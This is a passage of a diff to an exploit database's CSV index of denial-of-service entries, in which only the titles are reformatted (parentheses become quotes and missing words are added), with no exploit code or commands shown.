Service",2009-10-23,"laurent gaffie",multiple,dos,0 +9971,platforms/windows/dos/9971.php,"Spider Solitaire - Denial of Service (PoC)",2009-10-15,SirGod,windows,dos,0 9980,platforms/hardware/dos/9980.txt,"Websense Email Security - Denial of Service",2009-10-20,"Nikolas Sotiriu",hardware,dos,0 9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 @@ -1331,15 +1332,15 @@ id,file,description,date,author,platform,type,port 11106,platforms/multiple/dos/11106.bat,"Nuked KLan 1.7.7 & SP4 - Denial of Service",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote Denial of Service",2010-01-12,mr_me,ios,dos,8080 11125,platforms/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow (Denial of Service) (PoC)",2010-01-13,"Julien Bedard",hardware,dos,2121 -11130,platforms/windows/dos/11130.pl,"Ofilter Player - (skin.ini) Local Crash (PoC)",2010-01-13,"Rehan Ahmed",windows,dos,0 +11130,platforms/windows/dos/11130.pl,"Ofilter Player - 'skin.ini' Local Crash (PoC)",2010-01-13,"Rehan Ahmed",windows,dos,0 11131,platforms/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,windows,dos,0 11132,platforms/windows/dos/11132.pl,"Nemesis Player (NSP) - Local Denial of Service",2010-01-13,"Rehan Ahmed",windows,dos,0 -11133,platforms/windows/dos/11133.pl,"NPlayer - (.dat Skin) Local Heap Overflow (PoC)",2010-01-13,"Rehan Ahmed",windows,dos,0 +11133,platforms/windows/dos/11133.pl,"NPlayer - '.dat Skin' Local Heap Overflow (PoC)",2010-01-13,"Rehan Ahmed",windows,dos,0 11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (iTunes & QuickTime etc)",2010-01-15,Dr_IDE,multiple,dos,0 11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - Overwrite (SEH) (PoC)",2010-01-15,Darkb0x,windows,dos,0 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - '.rt' Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",windows,dos,0 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 / 2.0 - Local Crash (PoC)",2010-01-15,R3d-D3V!L,windows,dos,0 -11165,platforms/windows/dos/11165.pl,"MediaMonkey Player - Local Denial of Service",2010-01-17,Red-D3v1L,windows,dos,0 +11165,platforms/windows/dos/11165.pl,"MediaMonkey 3.2.0 - Local Denial of Service",2010-01-17,Red-D3v1L,windows,dos,0 11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,dos,0 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service",2010-01-18,Red-D3v1L,windows,dos,0 11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 @@ -1438,7 +1439,7 @@ id,file,description,date,author,platform,type,port 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0 -11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 +11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0 11842,platforms/windows/dos/11842.py,"freeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0 @@ -1494,7 +1495,7 @@ id,file,description,date,author,platform,type,port 12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local Denial of Service (.bkd)",2010-04-14,anonymous,windows,dos,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos,0 15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 -12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 +12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml config parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0 12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0 @@ -1508,13 +1509,13 @@ id,file,description,date,author,platform,type,port 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos,0 12336,platforms/windows/dos/12336.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12337,platforms/windows/dos/12337.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 -12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0 +12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0 12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)",2010-04-23,p4r4N0ID,windows,dos,0 12375,platforms/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0 12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 -12408,platforms/windows/dos/12408.pl,"Apple Safari 4.0.5 - (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 +12408,platforms/windows/dos/12408.pl,"Apple Safari 4.0.5 (531.22.7) - Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 12422,platforms/windows/dos/12422.pl,"Acoustica 3.32 CD/DVD Label Maker - '.m3u' (PoC)",2010-04-27,chap0,windows,dos,0 12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0 12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0 @@ -1578,7 +1579,7 @@ id,file,description,date,author,platform,type,port 13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD - Remote Exploit (PoC)",2010-06-08,"Dillon Beresford",hardware,dos,80 13775,platforms/hardware/dos/13775.pl,"Motorola SB5101 - Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",hardware,dos,80 13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 -13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - (Mobile Office Suite) '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - Mobile Office Suite '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13836,platforms/windows/dos/13836.py,"SolarWinds TFTP Server 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0 @@ -1622,8 +1623,8 @@ id,file,description,date,author,platform,type,port 14282,platforms/windows/dos/14282.txt,"Microsoft Windows - cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0 -14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - (wpd) Buffer Overflow (PoC)",2010-07-12,LiquidWorm,windows,dos,0 -14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - (shw) Buffer Preoccupation (PoC)",2010-07-12,LiquidWorm,windows,dos,0 +14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - 'wpd' Buffer Overflow (PoC)",2010-07-12,LiquidWorm,windows,dos,0 +14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - 'shw' Buffer Preoccupation (PoC)",2010-07-12,LiquidWorm,windows,dos,0 14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 14372,platforms/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow",2010-07-16,shinnai,windows,dos,0 14379,platforms/multiple/dos/14379.txt,"Novell Groupwise Internet Agent - Stack Overflow",2010-07-16,"Francis Provencher",multiple,dos,0 @@ -1636,7 +1637,7 @@ id,file,description,date,author,platform,type,port 14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/Denial of Service",2010-07-26,"Praveen Darshanam",windows,dos,0 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0 -14504,platforms/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - (PoC)",2010-07-30,loneferret,windows,dos,0 +14504,platforms/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - Denial of Service (PoC)",2010-07-30,loneferret,windows,dos,0 14511,platforms/windows/dos/14511.pl,"ChordPulse 1.4 - Denial of Service",2010-07-30,Madjix,windows,dos,0 14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service",2010-08-02,s-dz,windows,dos,0 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service",2010-07-31,s-dz,windows,dos,0 @@ -1785,11 +1786,11 @@ id,file,description,date,author,platform,type,port 15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0 15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 -15432,platforms/windows/dos/15432.html,"LeadTools 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 -15433,platforms/windows/dos/15433.html,"LeadTools 11.5.0.9 - (ltlst11n.ocx) Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 +15432,platforms/windows/dos/15432.html,"LeadTools 11.5.0.9 - 'ltisi11n.ocx' DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 +15433,platforms/windows/dos/15433.html,"LeadTools 11.5.0.9 - 'ltlst11n.ocx' Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15434,platforms/windows/dos/15434.html,"LeadTools 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15435,platforms/windows/dos/15435.html,"LeadTools 11.5.0.9 (lttmb11n.ocx) - BrowseDir() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 -15436,platforms/windows/dos/15436.html,"LeadTools 11.5.0.9 - (ltdlg11n.ocx) Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 +15436,platforms/windows/dos/15436.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos,0 15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0 @@ -1819,7 +1820,7 @@ id,file,description,date,author,platform,type,port 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow Denial of Service",2011-01-18,"Vuk Ivanovic",windows,dos,0 15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - Null Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 15657,platforms/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 - Denial of Service",2010-12-02,h1ch4m,windows,dos,0 -15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - 'mp3' Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0 +15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0 15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 15671,platforms/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 15674,platforms/windows/dos/15674.rb,"TFTPUtil GUI 1.4.5 - Denial of Service (Metasploit)",2010-12-04,"Vuk Ivanovic",windows,dos,0 @@ -1827,12 +1828,12 @@ id,file,description,date,author,platform,type,port 15694,platforms/windows/dos/15694.txt,"WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 15695,platforms/windows/dos/15695.txt,"WinZip 15.0 - WZFLDVW.OCX IconIndex Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 - Safe Search for IE Denial of Service",2010-12-06,Dr_IDE,windows,dos,0 -15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess Denial of Service (PoC)",2010-12-06,Dr_IDE,windows,dos,0 +15698,platforms/windows/dos/15698.html,"Flash Player - 'Flash6.ocx' AllowScriptAccess Denial of Service (PoC)",2010-12-06,Dr_IDE,windows,dos,0 15705,platforms/linux/dos/15705.txt,"GNU InetUtils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15707,platforms/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",multiple,dos,0 15708,platforms/windows/dos/15708.html,"Microsoft Internet Explorer 8 - CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 -15803,platforms/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC UNAUTH'D Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",windows,dos,0 +15803,platforms/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",windows,dos,0 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos,0 15739,platforms/windows/dos/15739.pl,"Easy DVD Creator - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos,0 15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0 @@ -1886,7 +1887,7 @@ id,file,description,date,author,platform,type,port 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() Null Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 -16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash (PoC)",2011-02-19,KedAns-Dz,windows,dos,0 +16193,platforms/windows/dos/16193.pl,"Avira AntiVir - '.QUA' File 'avcenter.exe' Local Crash (PoC)",2011-02-19,KedAns-Dz,windows,dos,0 16204,platforms/windows/dos/16204.pl,"Solar FTP Server 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0 16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 @@ -1956,7 +1957,7 @@ id,file,description,date,author,platform,type,port 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 build 7283 - Session File Handling Buffer Overflow (PoC)",2011-05-13,LiquidWorm,windows,dos,0 17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences",2011-05-12,"Stefan LE BERRE",windows,dos,0 -17274,platforms/windows/dos/17274.txt,"SlimPDF Reader - (PoC)",2011-05-12,"Nicolas Krassas",windows,dos,0 +17274,platforms/windows/dos/17274.txt,"SlimPDF Reader - Denial of Service (PoC)",2011-05-12,"Nicolas Krassas",windows,dos,0 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 17291,platforms/windows/dos/17291.py,"Steam Software - Denial of Service",2011-05-16,david.r.klein,windows,dos,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - Denial of Service",2011-05-16,nSense,netware,dos,0 @@ -2096,11 +2097,11 @@ id,file,description,date,author,platform,type,port 18272,platforms/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service",2011-12-24,Level,windows,dos,0 18275,platforms/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream Blue Screen of Death",2011-12-18,webDEViL,win_x86-64,dos,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugins check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0 -18285,platforms/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - (libav) 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0 +18285,platforms/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - libav 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0 18295,platforms/linux/dos/18295.txt,"lighttpd - Denial of Service (PoC)",2011-12-31,pi3,linux,dos,0 18296,platforms/php/dos/18296.txt,"PHP 5.3.8 - Hashtables Denial of Service",2012-01-01,infodox,php,dos,0 19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0 -18305,platforms/php/dos/18305.py,"PHP Hash Table Collision - (PoC)",2012-01-03,"Christian Mehlmauer",php,dos,0 +18305,platforms/php/dos/18305.py,"PHP Hash Table Collision - Denial of Service (PoC)",2012-01-03,"Christian Mehlmauer",php,dos,0 18309,platforms/windows/dos/18309.pl,"VideoLAN VLC Media Player 1.1.11 - '.amr' Denial of Service (PoC)",2012-01-04,Fabi@habsec,windows,dos,0 18318,platforms/windows/dos/18318.py,"Netcut 2.0 - Denial of Service",2012-01-04,MaYaSeVeN,windows,dos,0 18977,platforms/php/dos/18977.php,"PHP 5.3.10 - spl_autoload_register() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 @@ -2118,7 +2119,7 @@ id,file,description,date,author,platform,type,port 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff' Denial of Service",2012-04-04,condis,windows,dos,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18436,platforms/linux/dos/18436.txt,"sudo 1.8.0 < 1.8.3p1 - Format String",2012-01-31,joernchen,linux,dos,0 -18440,platforms/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 - (officeviewermme.ocx) Buffer Overflow (PoC)",2012-01-31,LiquidWorm,windows,dos,0 +18440,platforms/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 - 'officeviewermme.ocx' Buffer Overflow (PoC)",2012-01-31,LiquidWorm,windows,dos,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 18457,platforms/linux/dos/18457.py,"torrent-stats - httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 @@ -2288,7 +2289,7 @@ id,file,description,date,author,platform,type,port 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 - PWS Denial of Service",1999-08-08,Narr0w,windows,dos,0 19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 - Negative Content Length Denial of Service",1999-08-08,rpc,multiple,dos,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos,0 -19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - (RFSync 1.0.0.1) Crash (PoC)",2012-06-29,"Luigi Auriemma",windows,dos,0 +19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - 'RFSync 1.0.0.1' Crash (PoC)",2012-06-29,"Luigi Auriemma",windows,dos,0 19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5 / IIS 4.0 / Site Server Commerce Edition 3.0 alpha/3.0 - Denial of Service",1999-08-11,"Nobuo Miwa",multiple,dos,0 19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,dos,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5 - HTML Form Control Denial of Service",1999-08-27,"Neon Bunny",windows,dos,0 @@ -2459,7 +2460,7 @@ id,file,description,date,author,platform,type,port 20438,platforms/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 20439,platforms/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 20440,platforms/windows/dos/20440.irc,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (4)",1997-05-07,"maddog and lerper",windows,dos,0 -20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - (services.exe) Denial of Service",2012-08-12,loneferret,windows,dos,0 +20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - 'services.exe' Denial of Service",2012-08-12,loneferret,windows,dos,0 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL Denial of Service",2000-12-05,benjurry,windows,dos,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service",2000-12-06,blackangels,hardware,dos,0 20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,kingcope,linux,dos,0 @@ -2783,7 +2784,7 @@ id,file,description,date,author,platform,type,port 22290,platforms/windows/dos/22290.c,"Electronic Arts Battlefield 1942 1.2/1.3 - Remote Administration Authentication Buffer Overflow",2003-02-26,greuff,windows,dos,0 22294,platforms/linux/dos/22294.c,"TCPDump 3.x - Malformed ISAKMP Packet Denial of Service",2003-03-01,"The Salvia Twist",linux,dos,0 22302,platforms/windows/dos/22302.rb,"hMAilServer 5.3.3 - IMAP Remote Crash (PoC)",2012-10-28,"John Smith",windows,dos,0 -22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program - (WinHlp32.exe) Crash (PoC)",2012-10-28,coolkaveh,windows,dos,0 +22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program - 'WinHlp32.exe' Crash (PoC)",2012-10-28,coolkaveh,windows,dos,0 22330,platforms/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash (PoC) (1)",2012-10-29,coolkaveh,windows,dos,0 22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0 22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos,0 @@ -3287,7 +3288,7 @@ id,file,description,date,author,platform,type,port 24866,platforms/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,hardware,dos,0 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow",2013-03-25,G0li47h,windows,dos,0 24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 -24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) 'libavcodec_plugin.dll' Denial of Service",2013-04-05,metacom,windows,dos,0 +24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - libav 'libavcodec_plugin.dll' Denial of Service",2013-04-05,metacom,windows,dos,0 24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 - Denial of Service",2013-04-05,npn,windows,dos,0 24940,platforms/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",windows,dos,0 24930,platforms/windows/dos/24930.txt,"Groovy Media Player 3.2.0 - '.mp3' Buffer Overflow",2013-04-08,"Akshaysinh Vaghela",windows,dos,0 @@ -3618,7 +3619,7 @@ id,file,description,date,author,platform,type,port 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 - '.HES' Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 - '.ANI' Image File Denial of Service",2006-08-09,sehato,windows,dos,0 -28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 - (default.mo) Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos,0 +28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 - 'default.mo' 